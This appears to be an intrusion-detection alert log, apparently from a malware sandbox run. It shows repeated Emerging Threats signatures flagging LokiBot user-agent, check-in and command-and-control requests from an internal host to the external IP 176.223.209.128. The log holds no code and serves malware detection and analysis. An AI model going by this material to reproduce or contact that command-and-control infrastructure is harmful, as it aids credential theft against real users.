                                              11/25/21-10:51:15.731165TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5020680192.168.11.20176.223.209.128
                                              11/25/21-10:51:15.731165TCP2025381ET TROJAN LokiBot Checkin5020680192.168.11.20176.223.209.128
                                              11/25/21-10:51:15.731165TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25020680192.168.11.20176.223.209.128
                                              11/25/21-10:51:16.250456TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15020780192.168.11.20176.223.209.128
                                              11/25/21-10:51:16.250456TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5020780192.168.11.20176.223.209.128
                                              11/25/21-10:51:16.250456TCP2025381ET TROJAN LokiBot Checkin5020780192.168.11.20176.223.209.128
                                              11/25/21-10:51:16.250456TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25020780192.168.11.20176.223.209.128
                                              11/25/21-10:51:16.767595TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15020880192.168.11.20176.223.209.128
                                              11/25/21-10:51:16.767595TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5020880192.168.11.20176.223.209.128
                                              11/25/21-10:51:16.767595TCP2025381ET TROJAN LokiBot Checkin5020880192.168.11.20176.223.209.128
                                              11/25/21-10:51:16.767595TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25020880192.168.11.20176.223.209.128
                                              11/25/21-10:51:17.275025TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15020980192.168.11.20176.223.209.128
                                              11/25/21-10:51:17.275025TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5020980192.168.11.20176.223.209.128
                                              11/25/21-10:51:17.275025TCP2025381ET TROJAN LokiBot Checkin5020980192.168.11.20176.223.209.128
                                              11/25/21-10:51:17.275025TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25020980192.168.11.20176.223.209.128
                                              11/25/21-10:51:17.712223TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15021180192.168.11.20176.223.209.128
                                              11/25/21-10:51:17.712223TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5021180192.168.11.20176.223.209.128
                                              11/25/21-10:51:17.712223TCP2025381ET TROJAN LokiBot Checkin5021180192.168.11.20176.223.209.128
                                              11/25/21-10:51:17.712223TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25021180192.168.11.20176.223.209.128
                                              11/25/21-10:51:18.178122TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15021280192.168.11.20176.223.209.128
                                              11/25/21-10:51:18.178122TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5021280192.168.11.20176.223.209.128
                                              11/25/21-10:51:18.178122TCP2025381ET TROJAN LokiBot Checkin5021280192.168.11.20176.223.209.128
                                              11/25/21-10:51:18.178122TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25021280192.168.11.20176.223.209.128
                                              11/25/21-10:51:18.705661TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15021380192.168.11.20176.223.209.128
                                              11/25/21-10:51:18.705661TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5021380192.168.11.20176.223.209.128
                                              11/25/21-10:51:18.705661TCP2025381ET TROJAN LokiBot Checkin5021380192.168.11.20176.223.209.128
                                              11/25/21-10:51:18.705661TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25021380192.168.11.20176.223.209.128
                                              11/25/21-10:51:19.166859TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15021480192.168.11.20176.223.209.128
                                              11/25/21-10:51:19.166859TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5021480192.168.11.20176.223.209.128
                                              11/25/21-10:51:19.166859TCP2025381ET TROJAN LokiBot Checkin5021480192.168.11.20176.223.209.128
                                              11/25/21-10:51:19.166859TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25021480192.168.11.20176.223.209.128
                                              11/25/21-10:51:19.718417TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15021580192.168.11.20176.223.209.128
                                              11/25/21-10:51:19.718417TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5021580192.168.11.20176.223.209.128
                                              11/25/21-10:51:19.718417TCP2025381ET TROJAN LokiBot Checkin5021580192.168.11.20176.223.209.128
                                              11/25/21-10:51:19.718417TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25021580192.168.11.20176.223.209.128
                                              11/25/21-10:51:20.224991TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15021680192.168.11.20176.223.209.128
                                              11/25/21-10:51:20.224991TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5021680192.168.11.20176.223.209.128
                                              11/25/21-10:51:20.224991TCP2025381ET TROJAN LokiBot Checkin5021680192.168.11.20176.223.209.128
                                              11/25/21-10:51:20.224991TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25021680192.168.11.20176.223.209.128
                                              11/25/21-10:51:20.725136TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15021780192.168.11.20176.223.209.128
                                              11/25/21-10:51:20.725136TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5021780192.168.11.20176.223.209.128
                                              11/25/21-10:51:20.725136TCP2025381ET TROJAN LokiBot Checkin5021780192.168.11.20176.223.209.128
                                              11/25/21-10:51:20.725136TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25021780192.168.11.20176.223.209.128
                                              11/25/21-10:51:21.156398TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15021880192.168.11.20176.223.209.128
                                              11/25/21-10:51:21.156398TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5021880192.168.11.20176.223.209.128
                                              11/25/21-10:51:21.156398TCP2025381ET TROJAN LokiBot Checkin5021880192.168.11.20176.223.209.128
                                              11/25/21-10:51:21.156398TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25021880192.168.11.20176.223.209.128
                                              11/25/21-10:51:21.660669TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15021980192.168.11.20176.223.209.128
                                              11/25/21-10:51:21.660669TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5021980192.168.11.20176.223.209.128
                                              11/25/21-10:51:21.660669TCP2025381ET TROJAN LokiBot Checkin5021980192.168.11.20176.223.209.128
                                              11/25/21-10:51:21.660669TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25021980192.168.11.20176.223.209.128
                                              11/25/21-10:51:22.171066TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15022080192.168.11.20176.223.209.128
                                              11/25/21-10:51:22.171066TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5022080192.168.11.20176.223.209.128
                                              11/25/21-10:51:22.171066TCP2025381ET TROJAN LokiBot Checkin5022080192.168.11.20176.223.209.128
                                              11/25/21-10:51:22.171066TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25022080192.168.11.20176.223.209.128
                                              11/25/21-10:51:22.650390TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15022180192.168.11.20176.223.209.128
                                              11/25/21-10:51:22.650390TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5022180192.168.11.20176.223.209.128
                                              11/25/21-10:51:22.650390TCP2025381ET TROJAN LokiBot Checkin5022180192.168.11.20176.223.209.128
                                              11/25/21-10:51:22.650390TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25022180192.168.11.20176.223.209.128
                                              11/25/21-10:51:23.144422TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15022280192.168.11.20176.223.209.128
                                              11/25/21-10:51:23.144422TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5022280192.168.11.20176.223.209.128
                                              11/25/21-10:51:23.144422TCP2025381ET TROJAN LokiBot Checkin5022280192.168.11.20176.223.209.128
                                              11/25/21-10:51:23.144422TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25022280192.168.11.20176.223.209.128
                                              11/25/21-10:51:23.652940TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15022380192.168.11.20176.223.209.128
                                              11/25/21-10:51:23.652940TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5022380192.168.11.20176.223.209.128
                                              11/25/21-10:51:23.652940TCP2025381ET TROJAN LokiBot Checkin5022380192.168.11.20176.223.209.128
                                              11/25/21-10:51:23.652940TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25022380192.168.11.20176.223.209.128
                                              11/25/21-10:51:24.110114TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15022480192.168.11.20176.223.209.128
                                              11/25/21-10:51:24.110114TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5022480192.168.11.20176.223.209.128
                                              11/25/21-10:51:24.110114TCP2025381ET TROJAN LokiBot Checkin5022480192.168.11.20176.223.209.128
                                              11/25/21-10:51:24.110114TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25022480192.168.11.20176.223.209.128
                                              11/25/21-10:51:24.605768TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15022580192.168.11.20176.223.209.128
                                              11/25/21-10:51:24.605768TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5022580192.168.11.20176.223.209.128
                                              11/25/21-10:51:24.605768TCP2025381ET TROJAN LokiBot Checkin5022580192.168.11.20176.223.209.128
                                              11/25/21-10:51:24.605768TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25022580192.168.11.20176.223.209.128
                                              11/25/21-10:51:25.134458TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15022680192.168.11.20176.223.209.128
                                              11/25/21-10:51:25.134458TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5022680192.168.11.20176.223.209.128
                                              11/25/21-10:51:25.134458TCP2025381ET TROJAN LokiBot Checkin5022680192.168.11.20176.223.209.128
                                              11/25/21-10:51:25.134458TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25022680192.168.11.20176.223.209.128
                                              11/25/21-10:51:25.644833TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15022780192.168.11.20176.223.209.128
                                              11/25/21-10:51:25.644833TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5022780192.168.11.20176.223.209.128
                                              11/25/21-10:51:25.644833TCP2025381ET TROJAN LokiBot Checkin5022780192.168.11.20176.223.209.128
                                              11/25/21-10:51:25.644833TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25022780192.168.11.20176.223.209.128
                                              11/25/21-10:51:26.123164TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15022880192.168.11.20176.223.209.128
                                              11/25/21-10:51:26.123164TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5022880192.168.11.20176.223.209.128
                                              11/25/21-10:51:26.123164TCP2025381ET TROJAN LokiBot Checkin5022880192.168.11.20176.223.209.128
                                              11/25/21-10:51:26.123164TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25022880192.168.11.20176.223.209.128
                                              11/25/21-10:51:26.626690TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15022980192.168.11.20176.223.209.128
                                              11/25/21-10:51:26.626690TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5022980192.168.11.20176.223.209.128
                                              11/25/21-10:51:26.626690TCP2025381ET TROJAN LokiBot Checkin5022980192.168.11.20176.223.209.128
                                              11/25/21-10:51:26.626690TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25022980192.168.11.20176.223.209.128
                                              11/25/21-10:51:27.099310TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15023080192.168.11.20176.223.209.128
                                              11/25/21-10:51:27.099310TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5023080192.168.11.20176.223.209.128
                                              11/25/21-10:51:27.099310TCP2025381ET TROJAN LokiBot Checkin5023080192.168.11.20176.223.209.128
                                              11/25/21-10:51:27.099310TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25023080192.168.11.20176.223.209.128
                                              11/25/21-10:51:27.588196TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15023180192.168.11.20176.223.209.128
                                              11/25/21-10:51:27.588196TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5023180192.168.11.20176.223.209.128
                                              11/25/21-10:51:27.588196TCP2025381ET TROJAN LokiBot Checkin5023180192.168.11.20176.223.209.128
                                              11/25/21-10:51:27.588196TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25023180192.168.11.20176.223.209.128
                                              11/25/21-10:51:28.063644TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15023280192.168.11.20176.223.209.128
                                              11/25/21-10:51:28.063644TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5023280192.168.11.20176.223.209.128
                                              11/25/21-10:51:28.063644TCP2025381ET TROJAN LokiBot Checkin5023280192.168.11.20176.223.209.128
                                              11/25/21-10:51:28.063644TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25023280192.168.11.20176.223.209.128
                                              11/25/21-10:51:28.555425TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15023380192.168.11.20176.223.209.128
                                              11/25/21-10:51:28.555425TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5023380192.168.11.20176.223.209.128
                                              11/25/21-10:51:28.555425TCP2025381ET TROJAN LokiBot Checkin5023380192.168.11.20176.223.209.128
                                              11/25/21-10:51:28.555425TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25023380192.168.11.20176.223.209.128
                                              11/25/21-10:51:29.050192TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15023480192.168.11.20176.223.209.128
                                              11/25/21-10:51:29.050192TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5023480192.168.11.20176.223.209.128
                                              11/25/21-10:51:29.050192TCP2025381ET TROJAN LokiBot Checkin5023480192.168.11.20176.223.209.128
                                              11/25/21-10:51:29.050192TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25023480192.168.11.20176.223.209.128
                                              11/25/21-10:51:29.546638TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15023580192.168.11.20176.223.209.128
                                              11/25/21-10:51:29.546638TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5023580192.168.11.20176.223.209.128
                                              11/25/21-10:51:29.546638TCP2025381ET TROJAN LokiBot Checkin5023580192.168.11.20176.223.209.128
                                              11/25/21-10:51:29.546638TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25023580192.168.11.20176.223.209.128
                                              11/25/21-10:51:30.065751TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15023680192.168.11.20176.223.209.128
                                              11/25/21-10:51:30.065751TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5023680192.168.11.20176.223.209.128
                                              11/25/21-10:51:30.065751TCP2025381ET TROJAN LokiBot Checkin5023680192.168.11.20176.223.209.128
                                              11/25/21-10:51:30.065751TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25023680192.168.11.20176.223.209.128
                                              11/25/21-10:51:30.571082TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15023780192.168.11.20176.223.209.128
                                              11/25/21-10:51:30.571082TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5023780192.168.11.20176.223.209.128
                                              11/25/21-10:51:30.571082TCP2025381ET TROJAN LokiBot Checkin5023780192.168.11.20176.223.209.128
                                              11/25/21-10:51:30.571082TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25023780192.168.11.20176.223.209.128
                                              11/25/21-10:51:31.087433TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15023880192.168.11.20176.223.209.128
                                              11/25/21-10:51:31.087433TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5023880192.168.11.20176.223.209.128
                                              11/25/21-10:51:31.087433TCP2025381ET TROJAN LokiBot Checkin5023880192.168.11.20176.223.209.128
                                              11/25/21-10:51:31.087433TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25023880192.168.11.20176.223.209.128
                                              11/25/21-10:51:31.605421TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15023980192.168.11.20176.223.209.128
                                              11/25/21-10:51:31.605421TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5023980192.168.11.20176.223.209.128
                                              11/25/21-10:51:31.605421TCP2025381ET TROJAN LokiBot Checkin5023980192.168.11.20176.223.209.128
                                              11/25/21-10:51:31.605421TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25023980192.168.11.20176.223.209.128
                                              11/25/21-10:51:32.121427TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15024080192.168.11.20176.223.209.128
                                              11/25/21-10:51:32.121427TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5024080192.168.11.20176.223.209.128
                                              11/25/21-10:51:32.121427TCP2025381ET TROJAN LokiBot Checkin5024080192.168.11.20176.223.209.128
                                              11/25/21-10:51:32.121427TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25024080192.168.11.20176.223.209.128
                                              11/25/21-10:51:32.627208TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15024180192.168.11.20176.223.209.128
                                              11/25/21-10:51:32.627208TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5024180192.168.11.20176.223.209.128
                                              11/25/21-10:51:32.627208TCP2025381ET TROJAN LokiBot Checkin5024180192.168.11.20176.223.209.128
                                              11/25/21-10:51:32.627208TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25024180192.168.11.20176.223.209.128
                                              11/25/21-10:51:33.085055TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15024280192.168.11.20176.223.209.128
                                              11/25/21-10:51:33.085055TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5024280192.168.11.20176.223.209.128
                                              11/25/21-10:51:33.085055TCP2025381ET TROJAN LokiBot Checkin5024280192.168.11.20176.223.209.128
                                              11/25/21-10:51:33.085055TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25024280192.168.11.20176.223.209.128
                                              11/25/21-10:51:33.603281TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15024380192.168.11.20176.223.209.128
                                              11/25/21-10:51:33.603281TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5024380192.168.11.20176.223.209.128
                                              11/25/21-10:51:33.603281TCP2025381ET TROJAN LokiBot Checkin5024380192.168.11.20176.223.209.128
                                              11/25/21-10:51:33.603281TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25024380192.168.11.20176.223.209.128
                                              11/25/21-10:51:34.090457TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15024480192.168.11.20176.223.209.128
                                              11/25/21-10:51:34.090457TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5024480192.168.11.20176.223.209.128
                                              11/25/21-10:51:34.090457TCP2025381ET TROJAN LokiBot Checkin5024480192.168.11.20176.223.209.128
                                              11/25/21-10:51:34.090457TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25024480192.168.11.20176.223.209.128
                                              11/25/21-10:51:34.587918TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15024580192.168.11.20176.223.209.128
                                              11/25/21-10:51:34.587918TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5024580192.168.11.20176.223.209.128
                                              11/25/21-10:51:34.587918TCP2025381ET TROJAN LokiBot Checkin5024580192.168.11.20176.223.209.128
                                              11/25/21-10:51:34.587918TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25024580192.168.11.20176.223.209.128
                                              11/25/21-10:51:35.114157TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15024680192.168.11.20176.223.209.128
                                              11/25/21-10:51:35.114157TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5024680192.168.11.20176.223.209.128
                                              11/25/21-10:51:35.114157TCP2025381ET TROJAN LokiBot Checkin5024680192.168.11.20176.223.209.128
                                              11/25/21-10:51:35.114157TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25024680192.168.11.20176.223.209.128
                                              11/25/21-10:51:35.578964TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15024780192.168.11.20176.223.209.128
                                              11/25/21-10:51:35.578964TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5024780192.168.11.20176.223.209.128
                                              11/25/21-10:51:35.578964TCP2025381ET TROJAN LokiBot Checkin5024780192.168.11.20176.223.209.128
                                              11/25/21-10:51:35.578964TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25024780192.168.11.20176.223.209.128
                                              11/25/21-10:51:36.082511TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15024880192.168.11.20176.223.209.128
                                              11/25/21-10:51:36.082511TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5024880192.168.11.20176.223.209.128
                                              11/25/21-10:51:36.082511TCP2025381ET TROJAN LokiBot Checkin5024880192.168.11.20176.223.209.128
                                              11/25/21-10:51:36.082511TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25024880192.168.11.20176.223.209.128
                                              11/25/21-10:51:36.600596TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15024980192.168.11.20176.223.209.128
                                              11/25/21-10:51:36.600596TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5024980192.168.11.20176.223.209.128
                                              11/25/21-10:51:36.600596TCP2025381ET TROJAN LokiBot Checkin5024980192.168.11.20176.223.209.128
                                              11/25/21-10:51:36.600596TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25024980192.168.11.20176.223.209.128
                                              11/25/21-10:51:37.097490TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15025080192.168.11.20176.223.209.128
                                              11/25/21-10:51:37.097490TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5025080192.168.11.20176.223.209.128
                                              11/25/21-10:51:37.097490TCP2025381ET TROJAN LokiBot Checkin5025080192.168.11.20176.223.209.128
                                              11/25/21-10:51:37.097490TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25025080192.168.11.20176.223.209.128
                                              11/25/21-10:51:37.589318TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15025180192.168.11.20176.223.209.128
                                              11/25/21-10:51:37.589318TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5025180192.168.11.20176.223.209.128
                                              11/25/21-10:51:37.589318TCP2025381ET TROJAN LokiBot Checkin5025180192.168.11.20176.223.209.128
                                              11/25/21-10:51:37.589318TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25025180192.168.11.20176.223.209.128
                                              11/25/21-10:51:38.094882TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15025280192.168.11.20176.223.209.128
                                              11/25/21-10:51:38.094882TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5025280192.168.11.20176.223.209.128
                                              11/25/21-10:51:38.094882TCP2025381ET TROJAN LokiBot Checkin5025280192.168.11.20176.223.209.128
                                              11/25/21-10:51:38.094882TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25025280192.168.11.20176.223.209.128
                                              11/25/21-10:51:38.599425TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15025380192.168.11.20176.223.209.128
                                              11/25/21-10:51:38.599425TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5025380192.168.11.20176.223.209.128
                                              11/25/21-10:51:38.599425TCP2025381ET TROJAN LokiBot Checkin5025380192.168.11.20176.223.209.128
                                              11/25/21-10:51:38.599425TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25025380192.168.11.20176.223.209.128
                                              11/25/21-10:51:39.110252TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15025480192.168.11.20176.223.209.128
                                              11/25/21-10:51:39.110252TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5025480192.168.11.20176.223.209.128
                                              11/25/21-10:51:39.110252TCP2025381ET TROJAN LokiBot Checkin5025480192.168.11.20176.223.209.128
                                              11/25/21-10:51:39.110252TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25025480192.168.11.20176.223.209.128
                                              11/25/21-10:51:39.626539TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15025580192.168.11.20176.223.209.128
                                              11/25/21-10:51:39.626539TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5025580192.168.11.20176.223.209.128
                                              11/25/21-10:51:39.626539TCP2025381ET TROJAN LokiBot Checkin5025580192.168.11.20176.223.209.128
                                              11/25/21-10:51:39.626539TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25025580192.168.11.20176.223.209.128
                                              11/25/21-10:51:40.142402TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15025680192.168.11.20176.223.209.128
                                              11/25/21-10:51:40.142402TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5025680192.168.11.20176.223.209.128
                                              11/25/21-10:51:40.142402TCP2025381ET TROJAN LokiBot Checkin5025680192.168.11.20176.223.209.128
                                              11/25/21-10:51:40.142402TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25025680192.168.11.20176.223.209.128
                                              11/25/21-10:51:40.656007TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15025780192.168.11.20176.223.209.128
                                              11/25/21-10:51:40.656007TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5025780192.168.11.20176.223.209.128
                                              11/25/21-10:51:40.656007TCP2025381ET TROJAN LokiBot Checkin5025780192.168.11.20176.223.209.128
                                              11/25/21-10:51:40.656007TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25025780192.168.11.20176.223.209.128
                                              11/25/21-10:51:41.141474TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15025880192.168.11.20176.223.209.128
                                              11/25/21-10:51:41.141474TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5025880192.168.11.20176.223.209.128
                                              11/25/21-10:51:41.141474TCP2025381ET TROJAN LokiBot Checkin5025880192.168.11.20176.223.209.128
                                              11/25/21-10:51:41.141474TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25025880192.168.11.20176.223.209.128
                                              11/25/21-10:51:41.613563TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15025980192.168.11.20176.223.209.128
                                              11/25/21-10:51:41.613563TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5025980192.168.11.20176.223.209.128
                                              11/25/21-10:51:41.613563TCP2025381ET TROJAN LokiBot Checkin5025980192.168.11.20176.223.209.128
                                              11/25/21-10:51:41.613563TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25025980192.168.11.20176.223.209.128
                                              11/25/21-10:51:42.168918TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15026080192.168.11.20176.223.209.128
                                              11/25/21-10:51:42.168918TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5026080192.168.11.20176.223.209.128
                                              11/25/21-10:51:42.168918TCP2025381ET TROJAN LokiBot Checkin5026080192.168.11.20176.223.209.128
                                              11/25/21-10:51:42.168918TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25026080192.168.11.20176.223.209.128
                                              11/25/21-10:51:42.653882TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15026180192.168.11.20176.223.209.128
                                              11/25/21-10:51:42.653882TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5026180192.168.11.20176.223.209.128
                                              11/25/21-10:51:42.653882TCP2025381ET TROJAN LokiBot Checkin5026180192.168.11.20176.223.209.128
                                              11/25/21-10:51:42.653882TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25026180192.168.11.20176.223.209.128
                                              11/25/21-10:51:43.154212TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15026280192.168.11.20176.223.209.128
                                              11/25/21-10:51:43.154212TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5026280192.168.11.20176.223.209.128
                                              11/25/21-10:51:43.154212TCP2025381ET TROJAN LokiBot Checkin5026280192.168.11.20176.223.209.128
                                              11/25/21-10:51:43.154212TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25026280192.168.11.20176.223.209.128
                                              11/25/21-10:51:43.663133TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15026380192.168.11.20176.223.209.128
                                              11/25/21-10:51:43.663133TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5026380192.168.11.20176.223.209.128
                                              11/25/21-10:51:43.663133TCP2025381ET TROJAN LokiBot Checkin5026380192.168.11.20176.223.209.128
                                              11/25/21-10:51:43.663133TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25026380192.168.11.20176.223.209.128
                                              11/25/21-10:51:44.124896TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15026480192.168.11.20176.223.209.128
                                              11/25/21-10:51:44.124896TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5026480192.168.11.20176.223.209.128
                                              11/25/21-10:51:44.124896TCP2025381ET TROJAN LokiBot Checkin5026480192.168.11.20176.223.209.128
                                              11/25/21-10:51:44.124896TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25026480192.168.11.20176.223.209.128
                                              11/25/21-10:51:44.645263TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15026580192.168.11.20176.223.209.128
                                              11/25/21-10:51:44.645263TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5026580192.168.11.20176.223.209.128
